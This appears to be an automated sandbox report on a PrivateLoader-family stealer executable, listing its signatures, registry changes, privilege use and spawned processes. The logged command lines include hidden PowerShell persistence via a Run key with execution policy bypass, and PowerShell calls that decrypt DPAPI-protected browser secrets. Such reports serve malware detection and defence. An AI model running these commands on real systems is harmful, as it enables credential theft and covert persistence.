Malware Analysis Report

2025-01-02 08:03

Sample ID 240510-bwc4qseb45
Target 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
SHA256 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
Tags
execution persistence spyware stealer privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef

Threat Level: Known bad

The file 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe was found to be: Known bad.

Malicious Activity Summary

execution persistence spyware stealer privateloader

Privateloader family

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Detects videocard installed

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 01:29

Signatures

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 01:29

Reported

2024-05-10 01:32

Platform

win7-20240419-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 01:29

Reported

2024-05-10 01:32

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\curl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\eCwyacTBVIkSrfh.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 996 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 4992 wrote to memory of 3576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4992 wrote to memory of 3576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4992 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3780 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3780 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4932 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4932 wrote to memory of 4012 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 996 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 3908 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3908 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 996 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2064 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 996 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 4180 wrote to memory of 3276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4180 wrote to memory of 3276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2400 wrote to memory of 3328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2400 wrote to memory of 3328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 996 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 1484 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 996 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\find.exe
PID 996 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\find.exe
PID 1624 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1624 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 996 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 1608 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 4540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2580 wrote to memory of 4540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 996 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1648 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4524 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4524 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 996 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 4892 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4892 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 996 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe C:\Windows\system32\cmd.exe
PID 2212 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2212 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2672 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2672 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3368 wrote to memory of 2504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3368 wrote to memory of 2504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A93.tmp" "c:\Users\Admin\AppData\Local\Temp\flpgohrl\CSCC6924A71820440CDA722ADBB1F6D8DF8.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

